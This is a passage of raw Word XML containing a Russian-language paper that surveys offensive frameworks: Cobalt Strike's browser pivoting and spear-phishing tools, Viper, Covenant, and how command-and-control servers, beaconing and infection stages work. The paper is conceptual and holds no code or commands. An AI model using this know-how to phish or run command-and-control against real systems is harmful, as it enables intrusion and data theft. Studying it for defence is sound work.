    <w:p w14:paraId="2C0BC5BC" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Документы Microsoft Office</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435CFB13" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программы Microsoft Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA12D2A" w14:textId="3187D757" w:rsidR="002A3235" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Инструмент клонирования веб-сайтов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E5CD4" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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rowser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Pivoting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метод, который, по существу, использует эксплуатируему</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю систему для получения доступа к аутентифицированным сеансам в браузере. Хороший способ продемонстрировать риск с помощью целенаправленной атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514C102C" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Cobalt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Strike реализует данную атаку используя прокси-сервер, который внедряется в 32-разрядную и 64-разрядну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ю версии Internet Explorer. При использовании браузера с такой модификацией злоумышленник получает файлы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cookie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аутентифицированные сеансы HTTP и клиентские SSL-сертификаты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E155C0C" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Фишинг - а именно целевой фишинг - метод, который намеренно нацелен на конкретных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лиц или группы в организации. Данный способ помогает выявлять слабые цели в организации, такие как сотрудники, которые более подвержены атакам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4479200F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Cobalt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Strike предлагает инструмент целевого фишинга, который позволяет импортировать сообщение, заменяя ссылки и текст, чтобы создать убедительное фишинговое письмо или сообщение. Он позволяет отправлять такие фишинговое сообщения, используя произвольное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сообщение в качестве шаблона при построении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CFC845" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Отчетность и ведение журнала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Cobalt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Strike также позволяет сформировать отчеты после эксплуатации, которые будут содержать временную шкалу и индикаторы компрометации, обнаруженные во время активности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Имеется возможность экспортировать эти отчеты как PDF или документ MS Word.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C7855" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Существует, однако, несколько проблем, которые влияют на использование</w:t>
      </w:r>
      <w:r w:rsidR="000F3D15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данной</w:t>
      </w:r>
      <w:r w:rsidR="000F3D15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программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4303B1" w14:textId="5ED793C3" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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F16443" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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1.1.3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Viper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FA01257" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Помимо перечисленных ранее инструментов и фреймворков существуют и менее попу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лярное программное обеспечение такое как аналог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Cobalt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Strike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Viper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AEC6FB2" w14:textId="536258CB" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Это весьма популярный в Китае инструмент, имеющий по сравнению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Cobalt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Strike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Metasploit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современный графический интерфейс, содержащий минимум 80 модулей, которые позволят перекрыть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многие потребности, возникающие при разведке, подготовке, атаке, повышении привилегий и выводе информации из скомпрометированной инфраструктуры</w:t>
      </w:r>
      <w:r w:rsidR="000A4BEC" w:rsidRPr="000A4B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[10]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B85BC35" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Viper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позволяет решать задачи обхода антивирусного программного обеспечения, туннелирования трафика, работы с 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айлами – включая создание троянских коней.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64920E1A" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Одна из отличительных особенностей данного фреймворка – возможность совместной работы с несколькими людьми, что упрощает взаимодействие в команде.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5233D4E9" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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7BC3D7" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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14D6BE" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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7EDD04" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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F19974" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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98B70F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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B36B9A" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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33D2C7" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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2A0258" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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A8D318" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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7012F8" w14:textId="03B11C37" w:rsidR="002A3235" w:rsidRDefault="002A32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941A76" w14:textId="18C7E85A" w:rsidR="00840AF7" w:rsidRDefault="00840A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29831C" w14:textId="7B97AEC5" w:rsidR="00840AF7" w:rsidRDefault="00840A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18C776" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00840A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94908F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="008F5C28" w:rsidRDefault="00EE7791" w:rsidP="000F3D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8F5C2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2. Command and Control servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A76F7" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="008F5C28" w:rsidRDefault="00EE7791" w:rsidP="000F3D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8F5C2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2.1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</w:t>
      </w:r>
      <w:r w:rsidRPr="008F5C2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сведения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1932EAB4" w14:textId="01D761D2" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Прежде чем переходить далее необходимо рассмотреть не менее </w:t>
      </w:r>
      <w:r w:rsidR="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>важную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часть любой атаки на инфраструктуру – поддержка, передача команд на зараженный узел\в сеть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5162B05D" w14:textId="1338338D" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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решения данной задачи существуют командно-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контрольные серверы, называемые также C2. На момент написания данной работы база данных MITRE ATT&amp;CK насчитывает 16 различных методов управления и контроля, каждый из которых имеет ряд техник, которые применялись в ранее проводимых и раскрытых кибератаках</w:t>
      </w:r>
      <w:r w:rsidR="00FB663C" w:rsidRPr="00FB66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[3]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214C9BC" w14:textId="675FEA4C" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Согласно исследованию Enterprise Strategy Group, половина из 315 специалистов по безопасности, опрошенных о вредоносных программах в организациях с более чем 1000 сотрудников, были «не очень знакомы» или «вообще не знакомы» с методами командно-контрольной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связи. Разрыв в знаниях увеличился в зависимости от ресурсов безопасности их организации, с 24% с передовыми программами безопасности до 48% со средними ресурсами и 82% с базовой кибербезопасностью</w:t>
      </w:r>
      <w:r w:rsidR="00FB663C" w:rsidRPr="00FB663C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FB663C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="00FB663C" w:rsidRPr="00FB663C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28C04FF" w14:textId="43ACA7A9" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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следует из названия, командно-контрольные серверы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ыдают команды и элементы управления скомпрометированным системам. Иногда связь между зараженной системой и командным сервером может быть достаточно простой – посредством сообщений через установленные почтовые мессенджеры в системе, известные порты, использ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уемые HTTP или FTP, а зачастую и более сложные – через VPN-туннели и P2P сети, замаскированным под веб-трафик вредоносным трафиком.  В то время как командно-контрольный сервер используется для управления системой внутри целевой организации, обычно именно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компрометированный узел инициирует связь изнутри сети с командно-контрольным сервером посредством сети Интернет, так как большинство организаций разрешают только известный и одобренный входящий трафик в своих сетях, но зачастую безразличны в том, какой тра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фик уходит в Интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8DBAE" w14:textId="77777777" w:rsidR="007D31F5" w:rsidRDefault="007D31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A859FE" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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2.2 Стадии заражения. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65913752" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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2.2.1 Заражение системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0431AA" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Типичным методом заражения вредоносным ПО являются попытки фишинга по электронной почте. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данный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 заставляет обманом жертву открыть вложение или ссылку на вредоносный веб-сайт, кото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рый имеет встроенную полезную нагрузку. Затем полезная нагрузка использует уязвимость системы, чтобы незаметно и быстро скомпрометировать компьютер. Конкретные используемые методы зависят от операционной системы или приложения, которое открывает вложение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1F750" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Когда вредоносный файл успешно выполняется на целевом компьютере – может быть открытие зараженного документа MS Word, или же неосторожный запуск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файла, успешно замаскировавшегося под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>медиафайл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одна из важных задач, которую необходимо решить – зарегист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рировать инфицирование системы на командном сервере, для чего в скором времени на данный сервер будет отправлен необходимый пакет.  «Телефонная книга» записана во вредоносный код и может содержать сотни полных доменных имен и IP-адресов, через которые вред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оносная программа будет проходить по мере выхода в командно-контрольную сеть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A98684" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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в заражаемой сети не будет контроля над исходящим трафиком, или же правила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брэндмаузера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будут настроены </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>некорректно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то вредоносная программа установит канал связи с серверо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управления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A303F" w14:textId="5E47023E" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Простая вредоносная программа инициирует обмен данными, отправляет готовое состояние и переходит в режим ожидания ответа от командно-контрольного сервера, отправляя через некоторые (случайные) промежутки времени так называемые </w:t>
      </w:r>
      <w:r w:rsidR="00840AF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eacons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пакет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ы, содержащие минимум информации, и дающие серверу представление о статусе той или иной зараженной машины.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39C6DD" w14:textId="76AB1955" w:rsidR="002A3235" w:rsidRDefault="002A32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EEE4A" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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2.2.2 Эскалация привилегий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50587D33" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D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Когда злоумышленники получают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Beacon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они могут изменить или иным образом манипулировать инструкциями для вредоносного ПО. Чтобы сохранить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первоначальную вредоносную программу небольшой и не привлекать внимание систем безопасности, многие функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>таких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 отправляют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Beacon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первом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ыполнении и ждут ответа, прежде чем предпринимать какие-либо другие операции. Но некоторые вредоносные программы будут выполнять ряд инструкций и операций, таких как пассивный сбор информации (прим.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Keylogers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и маяк выходит в командно-контрольную сеть тол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ько после успешного завершения этой операции или достижения каких-либо прописанных результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC7F214" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Как только канал связи будет установлен, командно-контрольный сервер проинструктирует вредоносную программу загрузить дополнительные пакеты и средства удаленно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го доступа на скомпрометированный хост, такое как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ShadyRAT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Злоумышленники попытаются заразить смежные узлы в пределах целевой сети, чтобы гарантировать, что, если одна система будет идентифицирована как зараженная, они все равно смогут сохранить доступ. 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акие недавно зараженные системы также начинают отправлять маяки на командно-контрольные серверы. Описанная схема продолжается, когда злоумышленники выполняют разведку на целевых системах, создавая теневую сеть в инфраструктуре предприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EE054" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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10C21F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00567E50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2.3 Платформы у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правления и контроля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3DD4E" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00567E50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Программное обеспечение, отвечающее за управление и контроль продвижением – самая важная часть эскалации атаки. Зачастую используются уже проверенные временем платформы и фреймворки - киберпреступники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пентестеры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используют такие поп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улярные платформы, как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Cobalt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Strike,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Covenant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Powershell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Empire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Armitage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Однако нельзя исключать и наличие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самописных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решений, особенно когда речь заходит о крупных группах киберпреступников или крупнейших IT-компаниях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7DBC19" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00567E50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разработки собственной сис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темы сбора информации необходимо рассмотреть существующие системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5DEDA" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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632DE2" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00567E50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2.3.1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Covenant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7EE40506" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00567E5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Ковенант имеет несколько ключевых особенностей, которые делают его полезным и отличают его от других структур командования и управления:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019DE825" w14:textId="39B6B361" w:rsidR="00567E50" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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7E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Интуитивно понятный интерфейс - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50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интуитивно понятное веб-приложение для легкого запуска и совмест</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ной работы </w:t>
      </w:r>
      <w:r w:rsidR="00840AF7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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E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40AF7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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E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86F713" w14:textId="77777777" w:rsidR="00567E50" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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67E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мультиплатформенность</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - фреймворк нацелена на .NET Core, который является </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>многоплатформенным</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это позволяет </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> работать на платформах Linux, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50"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 w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и Windows. Кроме того, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет поддержку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50"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Pr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, что позволяет ему работать</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контейнере в любой системе, в которой установлен </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50"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Pr="00567E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8AC3A9" w14:textId="77777777" w:rsidR="00567E50" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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7E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Поддержка нескольких пользователей - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> поддерживает многопользовательскую совместную работу. Способность к сотрудничеству стала решающей для эффективных операций </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>red</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E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7E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>team</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Многие пользовате</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ли могут взаимодействовать с одним и тем же сервером </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и работать независимо или совместно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D2212" w14:textId="77777777" w:rsidR="00567E50" w:rsidRPr="00567E50" w:rsidRDefault="00EE7791" w:rsidP="002948FA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7E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">API Driven - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> управляется API, который обеспечивает многопользовательскую совместную работу и легко расширяется. Кроме того, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Covenant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> включает в себя</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> пользовательский интерфейс </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Swagger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567E50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, который упрощает разработку и отладку.</w:t>
      </w:r>
    </w:p>
